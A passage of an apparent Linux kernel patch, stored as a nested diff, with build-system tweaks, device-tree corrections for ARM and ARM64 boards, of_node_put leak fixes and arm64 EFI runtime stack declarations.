+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+@@ -538,7 +538,7 @@ LDFLAGS_MODULE  =
+ CFLAGS_KERNEL	=
+ RUSTFLAGS_KERNEL =
+ AFLAGS_KERNEL	=
+-export LDFLAGS_vmlinux =
++LDFLAGS_vmlinux =
+ 
+ # Use USERINCLUDE when you must reference the UAPI directories only.
+ USERINCLUDE    := \
+@@ -1232,6 +1232,18 @@ vmlinux.o modules.builtin.modinfo modules.builtin: vmlinux_o
+ 	@:
+ 
+ PHONY += vmlinux
++# LDFLAGS_vmlinux in the top Makefile defines linker flags for the top vmlinux,
++# not for decompressors. LDFLAGS_vmlinux in arch/*/boot/compressed/Makefile is
++# unrelated; the decompressors just happen to have the same base name,
++# arch/*/boot/compressed/vmlinux.
++# Export LDFLAGS_vmlinux only to scripts/Makefile.vmlinux.
++#
++# _LDFLAGS_vmlinux is a workaround for the 'private export' bug:
++#   https://savannah.gnu.org/bugs/?61463
++# For Make > 4.4, the following simple code will work:
++#  vmlinux: private export LDFLAGS_vmlinux := $(LDFLAGS_vmlinux)
++vmlinux: private _LDFLAGS_vmlinux := $(LDFLAGS_vmlinux)
++vmlinux: export LDFLAGS_vmlinux = $(_LDFLAGS_vmlinux)
+ vmlinux: vmlinux.o $(KBUILD_LDS) modpost
+ 	$(Q)$(MAKE) -f $(srctree)/scripts/Makefile.vmlinux
+ 
+@@ -1517,6 +1529,7 @@ endif
+ # *.ko are usually independent of vmlinux, but CONFIG_DEBUG_INFOBTF_MODULES
+ # is an exception.
+ ifdef CONFIG_DEBUG_INFO_BTF_MODULES
++KBUILD_BUILTIN := 1
+ modules: vmlinux
+ endif
+ 
+diff --git a/arch/arm/boot/dts/imx6qdl-gw560x.dtsi b/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
+index 4bc4371e6bae5..4b81a975c979d 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
+@@ -632,7 +632,6 @@
+ &uart1 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_uart1>;
+-	uart-has-rtscts;
+ 	rts-gpios = <&gpio7 1 GPIO_ACTIVE_HIGH>;
+ 	status = "okay";
+ };
+diff --git a/arch/arm/boot/dts/imx6ul-pico-dwarf.dts b/arch/arm/boot/dts/imx6ul-pico-dwarf.dts
+index 162dc259edc8c..5a74c7f68eb62 100644
+--- a/arch/arm/boot/dts/imx6ul-pico-dwarf.dts
++++ b/arch/arm/boot/dts/imx6ul-pico-dwarf.dts
+@@ -32,7 +32,7 @@
+ };
+ 
+ &i2c2 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c2>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/imx7d-pico-dwarf.dts b/arch/arm/boot/dts/imx7d-pico-dwarf.dts
+index 5162fe227d1ea..fdc10563f1473 100644
+--- a/arch/arm/boot/dts/imx7d-pico-dwarf.dts
++++ b/arch/arm/boot/dts/imx7d-pico-dwarf.dts
+@@ -32,7 +32,7 @@
+ };
+ 
+ &i2c1 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+@@ -52,7 +52,7 @@
+ };
+ 
+ &i2c4 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/imx7d-pico-nymph.dts b/arch/arm/boot/dts/imx7d-pico-nymph.dts
+index 104a85254adbb..5afb1674e0125 100644
+--- a/arch/arm/boot/dts/imx7d-pico-nymph.dts
++++ b/arch/arm/boot/dts/imx7d-pico-nymph.dts
+@@ -43,7 +43,7 @@
+ };
+ 
+ &i2c1 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+@@ -64,7 +64,7 @@
+ };
+ 
+ &i2c2 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c2>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/sam9x60.dtsi b/arch/arm/boot/dts/sam9x60.dtsi
+index 8f5477e307dd4..37a5d96aaf642 100644
+--- a/arch/arm/boot/dts/sam9x60.dtsi
++++ b/arch/arm/boot/dts/sam9x60.dtsi
+@@ -564,7 +564,7 @@
+ 			mpddrc: mpddrc@ffffe800 {
+ 				compatible = "microchip,sam9x60-ddramc", "atmel,sama5d3-ddramc";
+ 				reg = <0xffffe800 0x200>;
+-				clocks = <&pmc PMC_TYPE_SYSTEM 2>, <&pmc PMC_TYPE_CORE PMC_MCK>;
++				clocks = <&pmc PMC_TYPE_SYSTEM 2>, <&pmc PMC_TYPE_PERIPHERAL 49>;
+ 				clock-names = "ddrck", "mpddr";
+ 			};
+ 
+diff --git a/arch/arm/boot/dts/stm32mp151a-prtt1l.dtsi b/arch/arm/boot/dts/stm32mp151a-prtt1l.dtsi
+index d865ab5d866b9..dd23de85100c4 100644
+--- a/arch/arm/boot/dts/stm32mp151a-prtt1l.dtsi
++++ b/arch/arm/boot/dts/stm32mp151a-prtt1l.dtsi
+@@ -101,8 +101,12 @@
+ 
+ &qspi {
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&qspi_clk_pins_a &qspi_bk1_pins_a>;
+-	pinctrl-1 = <&qspi_clk_sleep_pins_a &qspi_bk1_sleep_pins_a>;
++	pinctrl-0 = <&qspi_clk_pins_a
++		     &qspi_bk1_pins_a
++		     &qspi_cs1_pins_a>;
++	pinctrl-1 = <&qspi_clk_sleep_pins_a
++		     &qspi_bk1_sleep_pins_a
++		     &qspi_cs1_sleep_pins_a>;
+ 	reg = <0x58003000 0x1000>, <0x70000000 0x4000000>;
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi b/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
+index 30156b7546ed6..d540550f7da26 100644
+--- a/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
++++ b/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
+@@ -391,8 +391,12 @@
+ 
+ &qspi {
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&qspi_clk_pins_a &qspi_bk1_pins_a>;
+-	pinctrl-1 = <&qspi_clk_sleep_pins_a &qspi_bk1_sleep_pins_a>;
++	pinctrl-0 = <&qspi_clk_pins_a
++		     &qspi_bk1_pins_a
++		     &qspi_cs1_pins_a>;
++	pinctrl-1 = <&qspi_clk_sleep_pins_a
++		     &qspi_bk1_sleep_pins_a
++		     &qspi_cs1_sleep_pins_a>;
+ 	reg = <0x58003000 0x1000>, <0x70000000 0x4000000>;
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
+index 238a611192e72..d3b85a8764d74 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
+@@ -428,8 +428,12 @@
+ 
+ &qspi {
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&qspi_clk_pins_a &qspi_bk1_pins_a>;
+-	pinctrl-1 = <&qspi_clk_sleep_pins_a &qspi_bk1_sleep_pins_a>;
++	pinctrl-0 = <&qspi_clk_pins_a
++		     &qspi_bk1_pins_a
++		     &qspi_cs1_pins_a>;
++	pinctrl-1 = <&qspi_clk_sleep_pins_a
++		     &qspi_bk1_sleep_pins_a
++		     &qspi_cs1_sleep_pins_a>;
+ 	reg = <0x58003000 0x1000>, <0x70000000 0x4000000>;
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
+index 134a798ad3f23..bb40fb46da81d 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
+@@ -247,8 +247,12 @@
+ 
+ &qspi {
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&qspi_clk_pins_a &qspi_bk1_pins_a>;
+-	pinctrl-1 = <&qspi_clk_sleep_pins_a &qspi_bk1_sleep_pins_a>;
++	pinctrl-0 = <&qspi_clk_pins_a
++		     &qspi_bk1_pins_a
++		     &qspi_cs1_pins_a>;
++	pinctrl-1 = <&qspi_clk_sleep_pins_a
++		     &qspi_bk1_sleep_pins_a
++		     &qspi_cs1_sleep_pins_a>;
+ 	reg = <0x58003000 0x1000>, <0x70000000 0x200000>;
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+diff --git a/arch/arm/mach-imx/cpu-imx25.c b/arch/arm/mach-imx/cpu-imx25.c
+index 3e63445cde062..cc86977d0a340 100644
+--- a/arch/arm/mach-imx/cpu-imx25.c
++++ b/arch/arm/mach-imx/cpu-imx25.c
+@@ -23,6 +23,7 @@ static int mx25_read_cpu_rev(void)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx25-iim");
+ 	iim_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	BUG_ON(!iim_base);
+ 	rev = readl(iim_base + MXC_IIMSREV);
+ 	iounmap(iim_base);
+diff --git a/arch/arm/mach-imx/cpu-imx27.c b/arch/arm/mach-imx/cpu-imx27.c
+index bf70e13bbe9ee..1d28939083683 100644
+--- a/arch/arm/mach-imx/cpu-imx27.c
++++ b/arch/arm/mach-imx/cpu-imx27.c
+@@ -28,6 +28,7 @@ static int mx27_read_cpu_rev(void)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx27-ccm");
+ 	ccm_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	BUG_ON(!ccm_base);
+ 	/*
+ 	 * now we have access to the IO registers. As we need
+diff --git a/arch/arm/mach-imx/cpu-imx31.c b/arch/arm/mach-imx/cpu-imx31.c
+index b9c24b851d1ab..35c544924e509 100644
+--- a/arch/arm/mach-imx/cpu-imx31.c
++++ b/arch/arm/mach-imx/cpu-imx31.c
+@@ -39,6 +39,7 @@ static int mx31_read_cpu_rev(void)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx31-iim");
+ 	iim_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	BUG_ON(!iim_base);
+ 
+ 	/* read SREV register from IIM module */
+diff --git a/arch/arm/mach-imx/cpu-imx35.c b/arch/arm/mach-imx/cpu-imx35.c
+index 80e7d8ab9f1bb..1fe75b39c2d99 100644
+--- a/arch/arm/mach-imx/cpu-imx35.c
++++ b/arch/arm/mach-imx/cpu-imx35.c
+@@ -21,6 +21,7 @@ static int mx35_read_cpu_rev(void)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx35-iim");
+ 	iim_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	BUG_ON(!iim_base);
+ 
+ 	rev = imx_readl(iim_base + MXC_IIMSREV);
+diff --git a/arch/arm/mach-imx/cpu-imx5.c b/arch/arm/mach-imx/cpu-imx5.c
+index ad56263778f93..a67c89bf155dd 100644
+--- a/arch/arm/mach-imx/cpu-imx5.c
++++ b/arch/arm/mach-imx/cpu-imx5.c
+@@ -28,6 +28,7 @@ static u32 imx5_read_srev_reg(const char *compat)
+ 
+ 	np = of_find_compatible_node(NULL, NULL, compat);
+ 	iim_base = of_iomap(np, 0);
++	of_node_put(np);
+ 	WARN_ON(!iim_base);
+ 
+ 	srev = readl(iim_base + IIM_SREV) & 0xff;
+diff --git a/arch/arm/mm/nommu.c b/arch/arm/mm/nommu.c
+index c1494a4dee25b..53f2d8774fdb9 100644
+--- a/arch/arm/mm/nommu.c
++++ b/arch/arm/mm/nommu.c
+@@ -161,7 +161,7 @@ void __init paging_init(const struct machine_desc *mdesc)
+ 	mpu_setup();
+ 
+ 	/* allocate the zero page. */
+-	zero_page = memblock_alloc(PAGE_SIZE, PAGE_SIZE);
++	zero_page = (void *)memblock_alloc(PAGE_SIZE, PAGE_SIZE);
+ 	if (!zero_page)
+ 		panic("%s: Failed to allocate %lu bytes align=0x%lx\n",
+ 		      __func__, PAGE_SIZE, PAGE_SIZE);
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-beacon-baseboard.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-beacon-baseboard.dtsi
+index 03266bd90a06b..169f047fbca50 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-beacon-baseboard.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-beacon-baseboard.dtsi
+@@ -120,7 +120,7 @@
+ &ecspi2 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_espi2>;
+-	cs-gpios = <&gpio5 9 GPIO_ACTIVE_LOW>;
++	cs-gpios = <&gpio5 13 GPIO_ACTIVE_LOW>;
+ 	status = "okay";
+ 
+ 	eeprom@0 {
+@@ -316,7 +316,7 @@
+ 			MX8MM_IOMUXC_ECSPI2_SCLK_ECSPI2_SCLK		0x82
+ 			MX8MM_IOMUXC_ECSPI2_MOSI_ECSPI2_MOSI		0x82
+ 			MX8MM_IOMUXC_ECSPI2_MISO_ECSPI2_MISO		0x82
+-			MX8MM_IOMUXC_ECSPI1_SS0_GPIO5_IO9		0x41
++			MX8MM_IOMUXC_ECSPI2_SS0_GPIO5_IO13              0x41
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
+index d3ee6fc4baabd..72311b55f06da 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7901.dts
+@@ -759,6 +759,7 @@
+ &usbotg2 {
+ 	dr_mode = "host";
+ 	vbus-supply = <&reg_usb2_vbus>;
++	over-current-active-low;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin-dahlia.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin-dahlia.dtsi
+index c2a5c2f7b204b..7c3f5c54f0400 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin-dahlia.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin-dahlia.dtsi
+@@ -9,6 +9,7 @@
+ 		simple-audio-card,bitclock-master = <&dailink_master>;
+ 		simple-audio-card,format = "i2s";
+ 		simple-audio-card,frame-master = <&dailink_master>;
++		simple-audio-card,mclk-fs = <256>;
+ 		simple-audio-card,name = "imx8mm-wm8904";
+ 		simple-audio-card,routing =
+ 			"Headphone Jack", "HPOUTL",
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-verdin-dev.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-verdin-dev.dtsi
+index 73cc3fafa0180..b2bcd22821702 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-verdin-dev.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-verdin-dev.dtsi
+@@ -11,6 +11,7 @@
+ 		simple-audio-card,bitclock-master = <&dailink_master>;
+ 		simple-audio-card,format = "i2s";
+ 		simple-audio-card,frame-master = <&dailink_master>;
++		simple-audio-card,mclk-fs = <256>;
+ 		simple-audio-card,name = "imx8mm-nau8822";
+ 		simple-audio-card,routing =
+ 			"Headphones", "LHP",
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-evk.dts b/arch/arm64/boot/dts/freescale/imx8mp-evk.dts
+index b4c1ef2559f20..126c839b45f2d 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mp-evk.dts
+@@ -36,8 +36,8 @@
+ 
+ 	pcie0_refclk: pcie0-refclk {
+ 		compatible = "fixed-clock";
+-			#clock-cells = <0>;
+-			clock-frequency = <100000000>;
++		#clock-cells = <0>;
++		clock-frequency = <100000000>;
+ 	};
+ 
+ 	reg_can1_stby: regulator-can1-stby {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-phycore-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-phycore-som.dtsi
+index 79b290a002c19..ecc4bce6db97c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-phycore-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-phycore-som.dtsi
+@@ -99,7 +99,6 @@
+ 
+ 		regulators {
+ 			buck1: BUCK1 {
+-				regulator-compatible = "BUCK1";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <2187500>;
+ 				regulator-boot-on;
+@@ -108,7 +107,6 @@
+ 			};
+ 
+ 			buck2: BUCK2 {
+-				regulator-compatible = "BUCK2";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <2187500>;
+ 				regulator-boot-on;
+@@ -119,7 +117,6 @@
+ 			};
+ 
+ 			buck4: BUCK4 {
+-				regulator-compatible = "BUCK4";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <3400000>;
+ 				regulator-boot-on;
+@@ -127,7 +124,6 @@
+ 			};
+ 
+ 			buck5: BUCK5 {
+-				regulator-compatible = "BUCK5";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <3400000>;
+ 				regulator-boot-on;
+@@ -135,7 +131,6 @@
+ 			};
+ 
+ 			buck6: BUCK6 {
+-				regulator-compatible = "BUCK6";
+ 				regulator-min-microvolt = <600000>;
+ 				regulator-max-microvolt = <3400000>;
+ 				regulator-boot-on;
+@@ -143,7 +138,6 @@
+ 			};
+ 
+ 			ldo1: LDO1 {
+-				regulator-compatible = "LDO1";
+ 				regulator-min-microvolt = <1600000>;
+ 				regulator-max-microvolt = <3300000>;
+ 				regulator-boot-on;
+@@ -151,7 +145,6 @@
+ 			};
+ 
+ 			ldo2: LDO2 {
+-				regulator-compatible = "LDO2";
+ 				regulator-min-microvolt = <800000>;
+ 				regulator-max-microvolt = <1150000>;
+ 				regulator-boot-on;
+@@ -159,7 +152,6 @@
+ 			};
+ 
+ 			ldo3: LDO3 {
+-				regulator-compatible = "LDO3";
+ 				regulator-min-microvolt = <800000>;
+ 				regulator-max-microvolt = <3300000>;
+ 				regulator-boot-on;
+@@ -167,13 +159,11 @@
+ 			};
+ 
+ 			ldo4: LDO4 {
+-				regulator-compatible = "LDO4";
+ 				regulator-min-microvolt = <800000>;
+ 				regulator-max-microvolt = <3300000>;
+ 			};
+ 
+ 			ldo5: LDO5 {
+-				regulator-compatible = "LDO5";
+ 				regulator-min-microvolt = <1800000>;
+ 				regulator-max-microvolt = <3300000>;
+ 				regulator-boot-on;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index d944ecca1b3c2..47fd6a0ba05ad 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -523,6 +523,7 @@
+ 				compatible = "fsl,imx8mp-gpc";
+ 				reg = <0x303a0000 0x1000>;
+ 				interrupt-parent = <&gic>;
++				interrupts = <GIC_SPI 87 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-controller;
+ 				#interrupt-cells = <3>;
+ 
+@@ -589,7 +590,7 @@
+ 						reg = <IMX8MP_POWER_DOMAIN_MIPI_PHY2>;
+ 					};
+ 
+-					pgc_hsiomix: power-domains@17 {
++					pgc_hsiomix: power-domain@17 {
+ 						#power-domain-cells = <0>;
+ 						reg = <IMX8MP_POWER_DOMAIN_HSIOMIX>;
+ 						clocks = <&clk IMX8MP_CLK_HSIO_AXI>,
+diff --git a/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts b/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
+index 69786c326db00..27f9a9f331346 100644
+--- a/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx93-11x11-evk.dts
+@@ -74,7 +74,7 @@
+ 
+ 	pinctrl_usdhc1: usdhc1grp {
+ 		fsl,pins = <
+-			MX93_PAD_SD1_CLK__USDHC1_CLK		0x17fe
++			MX93_PAD_SD1_CLK__USDHC1_CLK		0x15fe
+ 			MX93_PAD_SD1_CMD__USDHC1_CMD		0x13fe
+ 			MX93_PAD_SD1_DATA0__USDHC1_DATA0	0x13fe
+ 			MX93_PAD_SD1_DATA1__USDHC1_DATA1	0x13fe
+@@ -84,7 +84,7 @@
+ 			MX93_PAD_SD1_DATA5__USDHC1_DATA5	0x13fe
+ 			MX93_PAD_SD1_DATA6__USDHC1_DATA6	0x13fe
+ 			MX93_PAD_SD1_DATA7__USDHC1_DATA7	0x13fe
+-			MX93_PAD_SD1_STROBE__USDHC1_STROBE	0x17fe
++			MX93_PAD_SD1_STROBE__USDHC1_STROBE	0x15fe
+ 		>;
+ 	};
+ 
+@@ -102,7 +102,7 @@
+ 
+ 	pinctrl_usdhc2: usdhc2grp {
+ 		fsl,pins = <
+-			MX93_PAD_SD2_CLK__USDHC2_CLK		0x17fe
++			MX93_PAD_SD2_CLK__USDHC2_CLK		0x15fe
+ 			MX93_PAD_SD2_CMD__USDHC2_CMD		0x13fe
+ 			MX93_PAD_SD2_DATA0__USDHC2_DATA0	0x13fe
+ 			MX93_PAD_SD2_DATA1__USDHC2_DATA1	0x13fe
+diff --git a/arch/arm64/boot/dts/marvell/ac5-98dx25xx.dtsi b/arch/arm64/boot/dts/marvell/ac5-98dx25xx.dtsi
+index 44ed6f963b75a..8e2ac687a410b 100644
+--- a/arch/arm64/boot/dts/marvell/ac5-98dx25xx.dtsi
++++ b/arch/arm64/boot/dts/marvell/ac5-98dx25xx.dtsi
+@@ -97,7 +97,7 @@
+ 
+ 			uart1: serial@12100 {
+ 				compatible = "snps,dw-apb-uart";
+-				reg = <0x11000 0x100>;
++				reg = <0x12100 0x100>;
+ 				reg-shift = <2>;
+ 				interrupts = <GIC_SPI 84 IRQ_TYPE_LEVEL_HIGH>;
+ 				reg-io-width = <1>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts b/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
+index c4e87d0aec42f..3ab0ad14e8704 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
++++ b/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
+@@ -11,6 +11,12 @@
+ #include <dt-bindings/gpio/gpio.h>
+ #include <dt-bindings/input/gpio-keys.h>
+ 
++/delete-node/ &adsp_mem;
++/delete-node/ &audio_mem;
++/delete-node/ &mpss_mem;
++/delete-node/ &peripheral_region;
++/delete-node/ &rmtfs_mem;
++
+ / {
+ 	model = "Xiaomi Mi 4C";
+ 	compatible = "xiaomi,libra", "qcom,msm8992";
+@@ -70,25 +76,67 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		/* This is for getting crash logs using Android downstream kernels */
+-		ramoops@dfc00000 {
+-			compatible = "ramoops";
+-			reg = <0x0 0xdfc00000 0x0 0x40000>;
+-			console-size = <0x10000>;
+-			record-size = <0x10000>;
+-			ftrace-size = <0x10000>;
+-			pmsg-size = <0x20000>;
++		memory_hole: hole@6400000 {
++			reg = <0 0x06400000 0 0x600000>;
++			no-map;
++		};
++
++		memory_hole2: hole2@6c00000 {
++			reg = <0 0x06c00000 0 0x2400000>;
++			no-map;
++		};
++
++		mpss_mem: mpss@9000000 {
++			reg = <0 0x09000000 0 0x5a00000>;
++			no-map;
++		};
++
++		tzapp: tzapp@ea00000 {
++			reg = <0 0x0ea00000 0 0x1900000>;
++			no-map;
++		};
++
++		mdm_rfsa_mem: mdm-rfsa@ca0b0000 {
++			reg = <0 0xca0b0000 0 0x10000>;
++			no-map;
++		};
++
++		rmtfs_mem: rmtfs@ca100000 {
++			compatible = "qcom,rmtfs-mem";
++			reg = <0 0xca100000 0 0x180000>;
++			no-map;
++
++			qcom,client-id = <1>;
+ 		};
+ 
+-		modem_region: modem_region@9000000 {
+-			reg = <0x0 0x9000000 0x0 0x5a00000>;
++		audio_mem: audio@cb400000 {
++			reg = <0 0xcb000000 0 0x400000>;
++			no-mem;
++		};
++
++		qseecom_mem: qseecom@cb400000 {
++			reg = <0 0xcb400000 0 0x1c00000>;
++			no-mem;
++		};
++
++		adsp_rfsa_mem: adsp-rfsa@cd000000 {
++			reg = <0 0xcd000000 0 0x10000>;
+ 			no-map;
+ 		};
+ 
+-		tzapp: modem_region@ea00000 {
+-			reg = <0x0 0xea00000 0x0 0x1900000>;
++		sensor_rfsa_mem: sensor-rfsa@cd010000 {
++			reg = <0 0xcd010000 0 0x10000>;
+ 			no-map;
+ 		};
++
++		ramoops@dfc00000 {
++			compatible = "ramoops";
++			reg = <0 0xdfc00000 0 0x40000>;
++			console-size = <0x10000>;
++			record-size = <0x10000>;
++			ftrace-size = <0x10000>;
++			pmsg-size = <0x20000>;
++		};
+ 	};
+ };
+ 
+@@ -130,11 +178,6 @@
+ 	status = "okay";
+ };
+ 
+-&peripheral_region {
+-	reg = <0x0 0x7400000 0x0 0x1c00000>;
+-	no-map;
+-};
+-
+ &pm8994_spmi_regulators {
+ 	VDD_APC0: s8 {
+ 		regulator-min-microvolt = <680000>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992.dtsi b/arch/arm64/boot/dts/qcom/msm8992.dtsi
+index 750643763a760..f4be09fc1b151 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992.dtsi
+@@ -36,10 +36,6 @@
+ 	compatible = "qcom,rpmcc-msm8992", "qcom,rpmcc";
+ };
+ 
+-&tcsr_mutex {
+-	compatible = "qcom,sfpb-mutex";
+-};
+-
+ &timer {
+ 	interrupts = <GIC_PPI 2 (GIC_CPU_MASK_SIMPLE(4) | IRQ_TYPE_LEVEL_LOW)>,
+ 			     <GIC_PPI 3 (GIC_CPU_MASK_SIMPLE(4) | IRQ_TYPE_LEVEL_LOW)>,
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 9f2a136d5cbc5..146a4285c3952 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1173,7 +1173,7 @@
+ 			clock-names = "aux", "ref_clk_src", "ref", "com_aux";
+ 
+ 			resets = <&gcc GCC_USB3_PHY_PRIM_BCR>,
+-				 <&gcc GCC_USB3_DP_PHY_PRIM_BCR>;
++				 <&gcc GCC_USB4_DP_PHY_PRIM_BCR>;
+ 			reset-names = "phy", "common";
+ 
+ 			power-domains = <&gcc USB30_PRIM_GDSC>;
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index b9f3165075c9d..b13c22046de58 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -14,8 +14,16 @@
+ 
+ #ifdef CONFIG_EFI
+ extern void efi_init(void);
++
++bool efi_runtime_fixup_exception(struct pt_regs *regs, const char *msg);
+ #else
+ #define efi_init()
++
++static inline
++bool efi_runtime_fixup_exception(struct pt_regs *regs, const char *msg)
++{
++	return false;
++}
+ #endif
+ 
+ int efi_create_mapping(struct mm_struct *mm, efi_memory_desc_t *md);
+@@ -40,8 +48,17 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ })
+ 
+ extern spinlock_t efi_rt_lock;
++extern u64 *efi_rt_stack_top;
+ efi_status_t __efi_rt_asm_wrapper(void *, const char *, ...);
+ 
++/*
++ * efi_rt_stack_top[-1] contains the value the stack pointer had before
++ * switching to the EFI runtime stack.
++ */
++#define current_in_efi()						\
++	(!preemptible() && efi_rt_stack_top != NULL &&			\
++	 on_task_stack(current, READ_ONCE(efi_rt_stack_top[-1]), 1))
++
+ #define ARCH_EFI_IRQ_FLAGS_MASK (PSR_D_BIT | PSR_A_BIT | PSR_I_BIT | PSR_F_BIT)
+ 
+ /*
+diff --git a/arch/arm64/include/asm/stacktrace.h b/arch/arm64/include/asm/stacktrace.h
+index 5a0edb064ea47..327cdcfcb1db0 100644
+--- a/arch/arm64/include/asm/stacktrace.h
++++ b/arch/arm64/include/asm/stacktrace.h
+@@ -104,4 +104,19 @@ static inline struct stack_info stackinfo_get_sdei_critical(void)
+ #define stackinfo_get_sdei_critical()	stackinfo_get_unknown()
+ #endif
+ 
++#ifdef CONFIG_EFI
++extern u64 *efi_rt_stack_top;
++
++static inline struct stack_info stackinfo_get_efi(void)
++{
++	unsigned long high = (u64)efi_rt_stack_top;
++	unsigned long low = high - THREAD_SIZE;
++
++	return (struct stack_info) {
++		.low = low,
++		.high = high,
++	};
++}
++#endif
++
+ #endif	/* __ASM_STACKTRACE_H */
+diff --git a/arch/arm64/kernel/efi-rt-wrapper.S b/arch/arm64/kernel/efi-rt-wrapper.S
+index 2d3c4b02393e4..e8ae803662cf1 100644
+--- a/arch/arm64/kernel/efi-rt-wrapper.S
